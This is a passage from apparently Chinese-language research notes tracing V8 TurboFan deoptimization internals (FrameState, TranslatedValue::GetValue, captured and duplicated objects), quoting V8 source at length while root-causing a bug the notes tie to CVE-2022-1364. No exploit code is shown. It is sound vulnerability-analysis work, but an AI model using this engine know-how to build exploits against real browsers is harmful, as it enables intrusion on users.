      values_descriptor, inputs, g, deduplicator, parameters, kind, zone);

  if (descriptor-&gt;HasContext()) {
    DCHECK_NOT_NULL(context);
    entries += AddOperandToStateValueDescriptor(
        values_descriptor, inputs, g, deduplicator, context,
        MachineType::AnyTagged(), FrameStateInputKind::kStackSlot, zone);
  }

  entries += AddInputsToFrameStateDescriptor(values_descriptor, inputs, g,
                                             deduplicator, locals, kind, zone);
  entries += AddInputsToFrameStateDescriptor(values_descriptor, inputs, g,
                                             deduplicator, stack, kind, zone);
  DCHECK_EQ(initial_size + entries, inputs-&gt;size());
  return entries;
}

size_t InstructionSelector::AddInputsToFrameStateDescriptor(
    StateValueList* values, InstructionOperandVector* inputs,
    OperandGenerator* g, StateObjectDeduplicator* deduplicator, Node* node,
    FrameStateInputKind kind, Zone* zone) {
  // StateValues are often shared across different nodes, and processing them is
  // expensive, so cache the result of processing a StateValue so that we can
  // quickly copy the result if we see it again.
  FrameStateInput key(node, kind);
  auto cache_entry = state_values_cache_.find(key);
  if (cache_entry != state_values_cache_.end()) {
    // Entry found in cache, emit cached version.
    return cache_entry-&gt;second-&gt;Emit(inputs, values);
  } else {
    // Not found in cache, generate and then store in cache if possible.
    size_t entries = 0;
    CachedStateValuesBuilder cache_builder(values, inputs, deduplicator);
    StateValuesAccess::iterator it = StateValuesAccess(node).begin();
    // Take advantage of sparse nature of StateValuesAccess to skip over
    // multiple empty nodes at once pushing repeated OptimizedOuts all in one
    // go.
    while (!it.done()) {
      values-&gt;PushOptimizedOut(it.AdvanceTillNotEmpty());
      if (it.done()) break;
      StateValuesAccess::TypedNode input_node = *it;
      entries += AddOperandToStateValueDescriptor(values, inputs, g,
                                                  deduplicator, input_node.node,
                                                  input_node.type, kind, zone);
      ++it;
    }
    if (cache_builder.CanCache()) {
      // Use this-&gt;zone() to build the cache entry in the instruction selector's
      // zone rather than the more long-lived instruction zone.
      state_values_cache_.emplace(key, cache_builder.Build(this-&gt;zone()));
    }
    return entries;
  }
}
</code></pre>

<p>可以看到追溯到了 FrameState 节点，VisitiDeoptimize 函数把 FrameStatme 节点中的信息，分成了 Descriptor 和 Operands 两部分。</p>

<p>这样 receiver 的信息就从 FrameState 传递到了编译后生成的代码中，最终在 <code class="language-plaintext highlighter-rouge">OptimizedFrame::Summarize</code> 函数中读取出来，用来重新创建 Receiver。</p>

<pre><code class="language-CPP">void OptimizedFrame::Summarize(std::vector&lt;FrameSummary&gt;* frames) const {
  DCHECK(frames-&gt;empty());
  DCHECK(is_optimized());

  // Delegate to JS frame in absence of turbofan deoptimization.
  // TODO(turbofan): Revisit once we support deoptimization across the board.
  Code code = LookupCode();
  if (code.kind() == CodeKind::BUILTIN) {
    return JavaScriptFrame::Summarize(frames);
  }

  int deopt_index = SafepointEntry::kNoDeoptIndex;
  DeoptimizationData const data = GetDeoptimizationData(&amp;deopt_index);
  if (deopt_index == SafepointEntry::kNoDeoptIndex) {
    CHECK(data.is_null());
    FATAL("Missing deoptimization information for OptimizedFrame::Summarize.");
  }

  // Prepare iteration over translation. Note that the below iteration might
  // materialize objects without storing them back to the Isolate, this will
  // lead to objects being re-materialized again for each summary.
  TranslatedState translated(this);
  translated.Prepare(fp());

  // We create the summary in reverse order because the frames
  // in the deoptimization translation are ordered bottom-to-top.
  bool is_constructor = IsConstructor();
  for (auto it = translated.begin(); it != translated.end(); it++) {
    if (it-&gt;kind() == TranslatedFrame::kUnoptimizedFunction ||
        it-&gt;kind() == TranslatedFrame::kJavaScriptBuiltinContinuation ||
        it-&gt;kind() ==
            TranslatedFrame::kJavaScriptBuiltinContinuationWithCatch) {
      Handle&lt;SharedFunctionInfo&gt; shared_info = it-&gt;shared_info();

      // The translation commands are ordered and the function is always
      // at the first position, and the receiver is next.
      TranslatedFrame::iterator translated_values = it-&gt;begin();

      // Get or materialize the correct function in the optimized frame.
      Handle&lt;JSFunction&gt; function =
          Handle&lt;JSFunction&gt;::cast(translated_values-&gt;GetValue());
      translated_values++;

      // Get or materialize the correct receiver in the optimized frame.
      Handle&lt;Object&gt; receiver = translated_values-&gt;GetValue(); // &lt;&lt; 这里读取 receier
      translated_values++;

      // Determine the underlying code object and the position within it from
      // the translation corresponding to the frame type in question.
      Handle&lt;AbstractCode&gt; abstract_code;
      unsigned code_offset;
      if (it-&gt;kind() == TranslatedFrame::kJavaScriptBuiltinContinuation ||
          it-&gt;kind() ==
              TranslatedFrame::kJavaScriptBuiltinContinuationWithCatch) {
        code_offset = 0;
        abstract_code = ToAbstractCode(
            isolate()-&gt;builtins()-&gt;code_handle(
                Builtins::GetBuiltinFromBytecodeOffset(it-&gt;bytecode_offset())),
            isolate());
      } else {
        DCHECK_EQ(it-&gt;kind(), TranslatedFrame::kUnoptimizedFunction);
        code_offset = it-&gt;bytecode_offset().ToInt();
        abstract_code =
            handle(shared_info-&gt;abstract_code(isolate()), isolate());
      }

      // Append full summary of the encountered JS frame.
      Handle&lt;FixedArray&gt; params = GetParameters();
      FrameSummary::JavaScriptFrameSummary summary(
          isolate(), *receiver, *function, *abstract_code, code_offset,
          is_constructor, *params);
      frames-&gt;push_back(summary);
      is_constructor = false;
    } else if (it-&gt;kind() == TranslatedFrame::kConstructStub) {
      // The next encountered JS frame will be marked as a constructor call.
      DCHECK(!is_constructor);
      is_constructor = true;
    }
  }
}
</code></pre>

<pre><code class="language-CPP">Handle&lt;Object&gt; TranslatedValue::GetValue() {
  Handle&lt;Object&gt; value(GetRawValue(), isolate());
  if (materialization_state() == kFinished) return value;

  if (value-&gt;IsSmi()) {
    // Even though stored as a Smi, this number might instead be needed as a
    // HeapNumber when materializing a JSObject with a field of HeapObject
    // representation. Since we don't have this information available here, we
    // just always allocate a HeapNumber and later extract the Smi again if we
    // don't need a HeapObject.
    set_initialized_storage(
        isolate()-&gt;factory()-&gt;NewHeapNumber(value-&gt;Number()));
    return value;
  }

  if (*value != ReadOnlyRoots(isolate()).arguments_marker()) {
    set_initialized_storage(Handle&lt;HeapObject&gt;::cast(value));
    return storage_;
  }

  // Otherwise we have to materialize.

  if (kind() == TranslatedValue::kCapturedObject ||
      kind() == TranslatedValue::kDuplicatedObject) {
    // We need to materialize the object (or possibly even object graphs).
    // To make the object verifier happy, we materialize in two steps.

    // 1. Allocate storage for reachable objects. This makes sure that for
    //    each object we have allocated space on heap. The space will be
    //    a byte array that will be later initialized, or a fully
    //    initialized object if it is safe to allocate one that will
    //    pass the verifier.
    container_-&gt;EnsureObjectAllocatedAt(this);

    // Finish any sweeping so that it becomes safe to overwrite the ByteArray
    // headers.
    // TODO(hpayer): Find a cleaner way to support a group of
    // non-fully-initialized objects.
    isolate()-&gt;heap()-&gt;mark_compact_collector()-&gt;EnsureSweepingCompleted();

    // 2. Initialize the objects. If we have allocated only byte arrays
    //    for some objects, we now overwrite the byte arrays with the
    //    correct object fields. Note that this phase does not allocate
    //    any new objects, so it does not trigger the object verifier.
    return container_-&gt;InitializeObjectAt(this);
  }

  double number = 0;
  Handle&lt;HeapObject&gt; heap_object;
  switch (kind()) {
    case TranslatedValue::kInt32:
      number = int32_value();
      heap_object = isolate()-&gt;factory()-&gt;NewHeapNumber(number);
      break;
    case TranslatedValue::kInt64:
      number = int64_value();
      heap_object = isolate()-&gt;factory()-&gt;NewHeapNumber(number);
      break;
    case TranslatedValue::kInt64ToBigInt:
      heap_object = BigInt::FromInt64(isolate(), int64_value());
      break;
    case TranslatedValue::kUInt32:
      number = uint32_value();
      heap_object = isolate()-&gt;factory()-&gt;NewHeapNumber(number);
      break;
    case TranslatedValue::kFloat:
      number = float_value().get_scalar();
      heap_object = isolate()-&gt;factory()-&gt;NewHeapNumber(number);
      break;
    case TranslatedValue::kDouble:
      number = double_value().get_scalar();
      heap_object = isolate()-&gt;factory()-&gt;NewHeapNumber(number);
      break;
    default:
      UNREACHABLE();
  }
  DCHECK(!IsSmiDouble(number) || kind() == TranslatedValue::kInt64ToBigInt);
  set_initialized_storage(heap_object);
  return storage_;
}
</code></pre>

<pre><code class="language-CPP">// We can't intermix stack decoding and allocations because the deoptimization
// infrastracture is not GC safe.
// Thus we build a temporary structure in malloced space.
// The TranslatedValue objects created correspond to the static translation
// instructions from the TranslationArrayIterator, except for
// TranslationOpcode::ARGUMENTS_ELEMENTS, where the number and values of the
// FixedArray elements depend on dynamic information from the optimized frame.
// Returns the number of expected nested translations from the
// TranslationArrayIterator.
int TranslatedState::CreateNextTranslatedValue(
    int frame_index, TranslationArrayIterator* iterator,
    DeoptimizationLiteralArray literal_array, Address fp,
    RegisterValues* registers, FILE* trace_file) {
  disasm::NameConverter converter;

  TranslatedFrame&amp; frame = frames_[frame_index];
  int value_index = static_cast&lt;int&gt;(frame.values_.size());

  TranslationOpcode opcode = TranslationOpcodeFromInt(iterator-&gt;Next());
  switch (opcode) {
    case TranslationOpcode::BEGIN:
    case TranslationOpcode::INTERPRETED_FRAME:
    case TranslationOpcode::ARGUMENTS_ADAPTOR_FRAME:
    case TranslationOpcode::CONSTRUCT_STUB_FRAME:
    case TranslationOpcode::JAVA_SCRIPT_BUILTIN_CONTINUATION_FRAME:
    case TranslationOpcode::JAVA_SCRIPT_BUILTIN_CONTINUATION_WITH_CATCH_FRAME:
    case TranslationOpcode::BUILTIN_CONTINUATION_FRAME:
#if V8_ENABLE_WEBASSEMBLY
    case TranslationOpcode::JS_TO_WASM_BUILTIN_CONTINUATION_FRAME:
#endif  // V8_ENABLE_WEBASSEMBLY
    case TranslationOpcode::UPDATE_FEEDBACK:
      // Peeled off before getting here.
      break;

    case TranslationOpcode::DUPLICATED_OBJECT: {
      int object_id = iterator-&gt;Next();
      if (trace_file != nullptr) {
        PrintF(trace_file, "duplicated object #%d", object_id);
      }
      object_positions_.push_back(object_positions_[object_id]);
      TranslatedValue translated_value =
          TranslatedValue::NewDuplicateObject(this, object_id);
      frame.Add(translated_value);
      return translated_value.GetChildrenCount();
    }

    case TranslationOpcode::ARGUMENTS_ELEMENTS: {
      CreateArgumentsType arguments_type =
          static_cast&lt;CreateArgumentsType&gt;(iterator-&gt;Next());
      CreateArgumentsElementsTranslatedValues(frame_index, fp, arguments_type,
                                              trace_file);
      return 0;
    }

    case TranslationOpcode::ARGUMENTS_LENGTH: {
      if (trace_file != nullptr) {
        PrintF(trace_file, "arguments length field (length = %d)",
               actual_argument_count_);
      }
      frame.Add(TranslatedValue::NewInt32(this, actual_argument_count_));
      return 0;
    }

    case TranslationOpcode::CAPTURED_OBJECT: {
      int field_count = iterator-&gt;Next();
      int object_index = static_cast&lt;int&gt;(object_positions_.size());
      if (trace_file != nullptr) {
        PrintF(trace_file, "captured object #%d (length = %d)", object_index,
               field_count);
      }
      object_positions_.push_back({frame_index, value_index});
      TranslatedValue translated_value =
          TranslatedValue::NewDeferredObject(this, field_count, object_index);
      frame.Add(translated_value);
      return translated_value.GetChildrenCount();
    }

    case TranslationOpcode::REGISTER: {
      int input_reg = iterator-&gt;Next();
      if (registers == nullptr) {
        TranslatedValue translated_value = TranslatedValue::NewInvalid(this);
        frame.Add(translated_value);
        return translated_value.GetChildrenCount();
      }
      intptr_t value = registers-&gt;GetRegister(input_reg);
      Address uncompressed_value = DecompressIfNeeded(value);
      if (trace_file != nullptr) {
        PrintF(trace_file, V8PRIxPTR_FMT " ; %s ", uncompressed_value,
               converter.NameOfCPURegister(input_reg));
        Object(uncompressed_value).ShortPrint(trace_file);
      }
      TranslatedValue translated_value =
          TranslatedValue::NewTagged(this, Object(uncompressed_value));
      frame.Add(translated_value);
      return translated_value.GetChildrenCount();
    }

    case TranslationOpcode::INT32_REGISTER: {
      int input_reg = iterator-&gt;Next();
      if (registers == nullptr) {
        TranslatedValue translated_value = TranslatedValue::NewInvalid(this);
        frame.Add(translated_value);
        return translated_value.GetChildrenCount();
      }
      intptr_t value = registers-&gt;GetRegister(input_reg);
      if (trace_file != nullptr) {
        PrintF(trace_file, "%" V8PRIdPTR " ; %s (int32)", value,
               converter.NameOfCPURegister(input_reg));
      }
      TranslatedValue translated_value =
          TranslatedValue::NewInt32(this, static_cast&lt;int32_t&gt;(value));
      frame.Add(translated_value);
      return translated_value.GetChildrenCount();
    }

    case TranslationOpcode::INT64_REGISTER: {
      int input_reg = iterator-&gt;Next();
      if (registers == nullptr) {
        TranslatedValue translated_value = TranslatedValue::NewInvalid(this);
        frame.Add(translated_value);
        return translated_value.GetChildrenCount();
      }
      intptr_t value = registers-&gt;GetRegister(input_reg);
      if (trace_file != nullptr) {
        PrintF(trace_file, "%" V8PRIdPTR " ; %s (int64)", value,
               converter.NameOfCPURegister(input_reg));
      }
      TranslatedValue translated_value =
          TranslatedValue::NewInt64(this, static_cast&lt;int64_t&gt;(value));
      frame.Add(translated_value);
      return translated_value.GetChildrenCount();
    }

    case TranslationOpcode::UINT32_REGISTER: {
      int input_reg = iterator-&gt;Next();
      if (registers == nullptr) {
        TranslatedValue translated_value = TranslatedValue::NewInvalid(this);
        frame.Add(translated_value);
        return translated_value.GetChildrenCount();
      }
      intptr_t value = registers-&gt;GetRegister(input_reg);
      if (trace_file != nullptr) {
        PrintF(trace_file, "%" V8PRIuPTR " ; %s (uint32)", value,
               converter.NameOfCPURegister(input_reg));
      }
      TranslatedValue translated_value =
          TranslatedValue::NewUInt32(this, static_cast&lt;uint32_t&gt;(value));
      frame.Add(translated_value);
      return translated_value.GetChildrenCount();
    }

    case TranslationOpcode::BOOL_REGISTER: {
      int input_reg = iterator-&gt;Next();
      if (registers == nullptr) {
        TranslatedValue translated_value = TranslatedValue::NewInvalid(this);
        frame.Add(translated_value);
        return translated_value.GetChildrenCount();
      }
      intptr_t value = registers-&gt;GetRegister(input_reg);
      if (trace_file != nullptr) {
        PrintF(trace_file, "%" V8PRIdPTR " ; %s (bool)", value,
               converter.NameOfCPURegister(input_reg));
      }
      TranslatedValue translated_value =
          TranslatedValue::NewBool(this, static_cast&lt;uint32_t&gt;(value));
      frame.Add(translated_value);
      return translated_value.GetChildrenCount();
    }

    case TranslationOpcode::FLOAT_REGISTER: {
      int input_reg = iterator-&gt;Next();
      if (registers == nullptr) {
        TranslatedValue translated_value = TranslatedValue::NewInvalid(this);
        frame.Add(translated_value);
        return translated_value.GetChildrenCount();
      }
      Float32 value = registers-&gt;GetFloatRegister(input_reg);
      if (trace_file != nullptr) {
        PrintF(trace_file, "%e ; %s (float)", value.get_scalar(),
               RegisterName(FloatRegister::from_code(input_reg)));
      }
      TranslatedValue translated_value = TranslatedValue::NewFloat(this, value);
      frame.Add(translated_value);
      return translated_value.GetChildrenCount();
    }

    case TranslationOpcode::DOUBLE_REGISTER: {
      int input_reg = iterator-&gt;Next();
      if (registers == nullptr) {
        TranslatedValue translated_value = TranslatedValue::NewInvalid(this);
        frame.Add(translated_value);
        return translated_value.GetChildrenCount();
      }
      Float64 value = registers-&gt;GetDoubleRegister(input_reg);
      if (trace_file != nullptr) {
        PrintF(trace_file, "%e ; %s (double)", value.get_scalar(),
               RegisterName(DoubleRegister::from_code(input_reg)));
      }
      TranslatedValue translated_value =
          TranslatedValue::NewDouble(this, value);
      frame.Add(translated_value);
      return translated_value.GetChildrenCount();
    }

    case TranslationOpcode::STACK_SLOT: {
      int slot_offset =
          OptimizedFrame::StackSlotOffsetRelativeToFp(iterator-&gt;Next());
      intptr_t value = *(reinterpret_cast&lt;intptr_t*&gt;(fp + slot_offset));
      Address uncompressed_value = DecompressIfNeeded(value);
      if (trace_file != nullptr) {
        PrintF(trace_file, V8PRIxPTR_FMT " ;  [fp %c %3d]  ",
               uncompressed_value, slot_offset &lt; 0 ? '-' : '+',
               std::abs(slot_offset));
        Object(uncompressed_value).ShortPrint(trace_file);
      }
      TranslatedValue translated_value =
          TranslatedValue::NewTagged(this, Object(uncompressed_value));
      frame.Add(translated_value);
      return translated_value.GetChildrenCount();
    }

    case TranslationOpcode::INT32_STACK_SLOT: {
      int slot_offset =
          OptimizedFrame::StackSlotOffsetRelativeToFp(iterator-&gt;Next());
      uint32_t value = GetUInt32Slot(fp, slot_offset);
      if (trace_file != nullptr) {
        PrintF(trace_file, "%d ; (int32) [fp %c %3d] ",
               static_cast&lt;int32_t&gt;(value), slot_offset &lt; 0 ? '-' : '+',
               std::abs(slot_offset));
      }
      TranslatedValue translated_value = TranslatedValue::NewInt32(this, value);
      frame.Add(translated_value);
      return translated_value.GetChildrenCount();
    }

    case TranslationOpcode::INT64_STACK_SLOT: {
      int slot_offset =
          OptimizedFrame::StackSlotOffsetRelativeToFp(iterator-&gt;Next());
      uint64_t value = GetUInt64Slot(fp, slot_offset);
      if (trace_file != nullptr) {
        PrintF(trace_file, "%" V8PRIdPTR " ; (int64) [fp %c %3d] ",
               static_cast&lt;intptr_t&gt;(value), slot_offset &lt; 0 ? '-' : '+',
               std::abs(slot_offset));
      }
      TranslatedValue translated_value = TranslatedValue::NewInt64(this, value);
      frame.Add(translated_value);
      return translated_value.GetChildrenCount();
    }

    case TranslationOpcode::UINT32_STACK_SLOT: {
      int slot_offset =
          OptimizedFrame::StackSlotOffsetRelativeToFp(iterator-&gt;Next());
      uint32_t value = GetUInt32Slot(fp, slot_offset);
      if (trace_file != nullptr) {
        PrintF(trace_file, "%u ; (uint32) [fp %c %3d] ", value,
               slot_offset &lt; 0 ? '-' : '+', std::abs(slot_offset));
      }
      TranslatedValue translated_value =
          TranslatedValue::NewUInt32(this, value);
      frame.Add(translated_value);
      return translated_value.GetChildrenCount();
    }

    case TranslationOpcode::BOOL_STACK_SLOT: {
      int slot_offset =
          OptimizedFrame::StackSlotOffsetRelativeToFp(iterator-&gt;Next());
      uint32_t value = GetUInt32Slot(fp, slot_offset);
      if (trace_file != nullptr) {
        PrintF(trace_file, "%u ; (bool) [fp %c %3d] ", value,
               slot_offset &lt; 0 ? '-' : '+', std::abs(slot_offset));
      }
      TranslatedValue translated_value = TranslatedValue::NewBool(this, value);
      frame.Add(translated_value);
      return translated_value.GetChildrenCount();
    }

    case TranslationOpcode::FLOAT_STACK_SLOT: {
      int slot_offset =
          OptimizedFrame::StackSlotOffsetRelativeToFp(iterator-&gt;Next());
      Float32 value = GetFloatSlot(fp, slot_offset);
      if (trace_file != nullptr) {
        PrintF(trace_file, "%e ; (float) [fp %c %3d] ", value.get_scalar(),
               slot_offset &lt; 0 ? '-' : '+', std::abs(slot_offset));
      }
      TranslatedValue translated_value = TranslatedValue::NewFloat(this, value);
      frame.Add(translated_value);
      return translated_value.GetChildrenCount();
    }

    case TranslationOpcode::DOUBLE_STACK_SLOT: {
      int slot_offset =
          OptimizedFrame::StackSlotOffsetRelativeToFp(iterator-&gt;Next());
      Float64 value = GetDoubleSlot(fp, slot_offset);
      if (trace_file != nullptr) {
        PrintF(trace_file, "%e ; (double) [fp %c %d] ", value.get_scalar(),
               slot_offset &lt; 0 ? '-' : '+', std::abs(slot_offset));
      }
      TranslatedValue translated_value =
          TranslatedValue::NewDouble(this, value);
      frame.Add(translated_value);
      return translated_value.GetChildrenCount();
    }

    case TranslationOpcode::LITERAL: {
      int literal_index = iterator-&gt;Next();
      Object value = literal_array.get(literal_index);
      if (trace_file != nullptr) {
        PrintF(trace_file, V8PRIxPTR_FMT " ; (literal %2d) ", value.ptr(),
               literal_index);
        value.ShortPrint(trace_file);
      }

      TranslatedValue translated_value =
          TranslatedValue::NewTagged(this, value);
      frame.Add(translated_value);
      return translated_value.GetChildrenCount();
    }
  }

  FATAL("We should never get here - unexpected deopt info.");
}
</code></pre>

<p><img src="https://www.plantuml.com/plantuml/png/NOz13i8W44Ntd88BU84kJ9iqBjnqeJlJnKGcIkmCP1WqUdffqTIuvF__7j0c1T5Caqatpn44o5w1tKEyAh9LoMXEknBZGK5nj9kjhUSUqrbyr22ZRMmN8xBhCKJrv5_OoIKJiYRplwwAem2d2TG7xaJWEJk-6QxthTWGiTGkcHcbNxGAzt27kgrq9W9PjCFdIMufcgPM9J0jiYj_VmC0" alt="plantum-diagram" /></p>

<p>StateValues</p>

<p>bitmask_</p>

<p>Environment::Checkpoint()</p>

<pre><code class="language-CPP">Node* BytecodeGraphBuilder::Environment::Checkpoint(
    BytecodeOffset bailout_id, OutputFrameStateCombine combine,
    const BytecodeLivenessState* liveness) {
  if (parameter_count() == register_count()) {
    // Re-use the state-value cache if the number of local registers happens
    // to match the parameter count.
    parameters_state_values_ =
        GetStateValuesFromCache(&amp;values()-&gt;at(0), parameter_count(), nullptr);
  } else {
    UpdateStateValues(&amp;parameters_state_values_, &amp;values()-&gt;at(0),
                      parameter_count());
  }

  Node* registers_state_values = GetStateValuesFromCache(
      &amp;values()-&gt;at(register_base()), register_count(), liveness);

  bool accumulator_is_live = !liveness || liveness-&gt;AccumulatorIsLive();
  Node* accumulator_state_value =
      accumulator_is_live &amp;&amp; combine != OutputFrameStateCombine::PokeAt(0)
          ? values()-&gt;at(accumulator_base())
          : builder()-&gt;jsgraph()-&gt;OptimizedOutConstant();

  const Operator* op = common()-&gt;FrameState(
      bailout_id, combine, builder()-&gt;frame_state_function_info());
  Node* result = graph()-&gt;NewNode(
      op, parameters_state_values_, registers_state_values,
      accumulator_state_value, Context(), builder()-&gt;GetFunctionClosure(),
      builder()-&gt;graph()-&gt;start());

  return result;
}

void BytecodeGraphBuilder::Environment::UpdateStateValues(Node** state_values,
                                                          Node** values,
                                                          int count) {
  if (StateValuesRequireUpdate(state_values, values, count)) {
    const Operator* op = common()-&gt;StateValues(count, SparseInputMask::Dense());
    (*state_values) = graph()-&gt;NewNode(op, count, values);
  }
}

const Operator* CommonOperatorBuilder::StateValues(int arguments,
                                                   SparseInputMask bitmask) {
  if (bitmask.IsDense()) {
    switch (arguments) {
#define CACHED_STATE_VALUES(arguments) \
  case arguments:                      \
    return &amp;cache_.kStateValues##arguments##Operator;
      CACHED_STATE_VALUES_LIST(CACHED_STATE_VALUES)
#undef CACHED_STATE_VALUES
      default:
        break;
    }
  }

#if DEBUG
  DCHECK(bitmask.IsDense() || bitmask.CountReal() == arguments);
#endif

  // Uncached.
  return zone()-&gt;New&lt;Operator1&lt;SparseInputMask&gt;&gt;(  // --
      IrOpcode::kStateValues, Operator::kPure,     // opcode
      "StateValues",                               // name
      arguments, 0, 0, 1, 0, 0,                    // counts
      bitmask);                                    // parameter
}

</code></pre>

<pre><code class="language-CPP">
// Issues:
// - Scopes - intimately tied to AST. Need to eval what is needed.
// - Need to resolve closure parameter treatment.
BytecodeGraphBuilder::Environment::Environment(
    BytecodeGraphBuilder* builder, int register_count, int parameter_count,
    interpreter::Register incoming_new_target_or_generator,
    Node* control_dependency)
    : builder_(builder),
      register_count_(register_count),
      parameter_count_(parameter_count),
      control_dependency_(control_dependency),
      effect_dependency_(control_dependency),
      values_(builder-&gt;local_zone()),
      parameters_state_values_(nullptr),
      generator_state_(nullptr) {
  // The layout of values_ is:
  //
  // [receiver] [parameters] [registers] [accumulator]
  //
  // parameter[0] is the receiver (this), parameters 1..N are the
  // parameters supplied to the method (arg0..argN-1). The accumulator
  // is stored separately.

  // Parameters including the receiver
  for (int i = 0; i &lt; parameter_count; i++) {
    const char* debug_name = (i == 0) ? "%this" : nullptr;
    Node* parameter = builder-&gt;GetParameter(i, debug_name);
    values()-&gt;push_back(parameter);
  }

  // Registers
  register_base_ = static_cast&lt;int&gt;(values()-&gt;size());
  Node* undefined_constant = builder-&gt;jsgraph()-&gt;UndefinedConstant();
  values()-&gt;insert(values()-&gt;end(), register_count, undefined_constant);

  // Accumulator
  accumulator_base_ = static_cast&lt;int&gt;(values()-&gt;size());
  values()-&gt;push_back(undefined_constant);

  // Context
  int context_index = Linkage::GetJSCallContextParamIndex(parameter_count);
  context_ = builder-&gt;GetParameter(context_index, "%context");

  // Incoming new.target or generator register
  if (incoming_new_target_or_generator.is_valid()) {
    int new_target_index =
        Linkage::GetJSCallNewTargetParamIndex(parameter_count);
    Node* new_target_node =
        builder-&gt;GetParameter(new_target_index, "%new.target");

    int values_index = RegisterToValuesIndex(incoming_new_target_or_generator);
    values()-&gt;at(values_index) = new_target_node;
  }
}

Node* BytecodeGraphBuilder::GetParameter(int parameter_index,
                                         const char* debug_name_hint) {
  // We use negative indices for some parameters.
  DCHECK_LE(ParameterInfo::kMinIndex, parameter_index);
  const size_t index =
      static_cast&lt;size_t&gt;(parameter_index - ParameterInfo::kMinIndex);

  if (cached_parameters_.size() &lt;= index) {
    cached_parameters_.resize(index + 1, nullptr);
  }

  if (cached_parameters_[index] == nullptr) {
    cached_parameters_[index] =
        NewNode(common()-&gt;Parameter(parameter_index, debug_name_hint),
                graph()-&gt;start());
  }

  return cached_parameters_[index];
}

</code></pre>

<p>TODO:</p>
<ul>
  <li>inline 的时候对 param 有没有特殊处理</li>
  <li>到底是什么地方的 FrameState 最后被使用了</li>
</ul>

<p>js-inlining.cc:716, 创建了一个特殊的 FrameState，里面保存了调用函数的参数的信息</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="c1">// Insert argument adaptor frame if required. The callees formal parameter</span>
  <span class="c1">// count have to match the number of arguments passed</span>
  <span class="c1">// to the call.</span>
  <span class="kt">int</span> <span class="n">parameter_count</span> <span class="o">=</span>
      <span class="n">shared_info</span><span class="o">-&gt;</span><span class="n">internal_formal_parameter_count_without_receiver</span><span class="p">();</span>
  <span class="n">DCHECK_EQ</span><span class="p">(</span><span class="n">parameter_count</span><span class="p">,</span> <span class="n">start</span><span class="p">.</span><span class="n">FormalParameterCountWithoutReceiver</span><span class="p">());</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">call</span><span class="p">.</span><span class="n">argument_count</span><span class="p">()</span> <span class="o">!=</span> <span class="n">parameter_count</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">frame_state</span> <span class="o">=</span> <span class="n">CreateArtificialFrameState</span><span class="p">(</span>
        <span class="n">node</span><span class="p">,</span> <span class="n">frame_state</span><span class="p">,</span> <span class="n">call</span><span class="p">.</span><span class="n">argument_count</span><span class="p">(),</span> <span class="n">BytecodeOffset</span><span class="o">::</span><span class="n">None</span><span class="p">(),</span>
        <span class="n">FrameStateType</span><span class="o">::</span><span class="n">kArgumentsAdaptor</span><span class="p">,</span> <span class="o">*</span><span class="n">shared_info</span><span class="p">);</span>
  <span class="p">}</span>

  <span class="k">return</span> <span class="n">InlineCall</span><span class="p">(</span><span class="n">node</span><span class="p">,</span> <span class="n">new_target</span><span class="p">,</span> <span class="n">context</span><span class="p">,</span> <span class="n">frame_state</span><span class="p">,</span> <span class="n">start</span><span class="p">,</span> <span class="n">end</span><span class="p">,</span>
                    <span class="n">exception_target</span><span class="p">,</span> <span class="n">uncaught_subcalls</span><span class="p">,</span> <span class="n">call</span><span class="p">.</span><span class="n">argument_count</span><span class="p">());</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Pc() -&gt; SafePointTable -&gt; SafePointEntry -&gt; DeoptIndex -&gt; DeoptData -&gt; Translate -&gt; FrameSummary</p>

<hr />
<p>调试环境</p>
<ul>
  <li>F:\chromium_exp\chromium_exp\CVE-2022-1364\poc</li>
  <li>F:\v8\v8\</li>
  <li>
    <p>todo: tools to visualize tq structure</p>
  </li>
  <li>
    <table>
      <tbody>
        <tr>
          <td>kFlags_deoptimize means? DeoptmizeIf/DeoptmizeUnless =&gt; OpcodeXxxCmp/Test</td>
          <td>= kFlags_deoptimize</td>
        </tr>
      </tbody>
    </table>
  </li>
</ul>

<hr />
<p>了解了这些信息后，我们再从错误发生的点开始，往前回溯整个流程。</p>

<p>对象被错误的实例化，发生在 <code class="language-plaintext highlighter-rouge">translate-state.cc:TranslatedValue::GetValue()</code> 函数中，正在处理的当前对象类型为 <code class="language-plaintext highlighter-rouge">TranslateValue::kDuplicatedObject</code>，代表栈的此位置上存放的是一个栈中其他地方已经存在的对象，所以 translationArray 中只存放了对象的 id, 这个 id 指向了另一个栈上的 <code class="language-plaintext highlighter-rouge">TranslateValue::kCapturedObject</code> 对象所在的位置，之后程序调用 <code class="language-plaintext highlighter-rouge">TranslatedState::EnsureObjectAllocatedAt</code> 函数来恢复这个 <code class="language-plaintext highlighter-rouge">kCapturedObject</code>。</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">kDuplicatedObject</code> 和 <code class="language-plaintext highlighter-rouge">kCapturedObject</code> 的类型，都是在 instruction-selector</p>

<p><code class="language-plaintext highlighter-rouge">kCapturedObject</code> 和 <code class="language-plaintext highlighter-rouge">kDuplicatedObject</code> 来自代码生成阶段执行的 <code class="language-plaintext highlighter-rouge">CodeGenerator::TranlateStateValueDescriptor</code> 函数</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="n">CodeGenerator</span><span class="o">::</span><span class="n">TranslateStateValueDescriptor</span><span class="p">(</span>
    <span class="n">StateValueDescriptor</span><span class="o">*</span> <span class="n">desc</span><span class="p">,</span> <span class="n">StateValueList</span><span class="o">*</span> <span class="n">nested</span><span class="p">,</span>
    <span class="n">InstructionOperandIterator</span><span class="o">*</span> <span class="n">iter</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">desc</span><span class="o">-&gt;</span><span class="n">IsNested</span><span class="p">())</span> <span class="p">{</span>
    <span class="c1">// 这里写入 kCapturedObject</span>
    <span class="n">translations_</span><span class="p">.</span><span class="n">BeginCapturedObject</span><span class="p">(</span><span class="k">static_cast</span><span class="o">&lt;</span><span class="kt">int</span><span class="o">&gt;</span><span class="p">(</span><span class="n">nested</span><span class="o">-&gt;</span><span class="n">size</span><span class="p">()));</span>
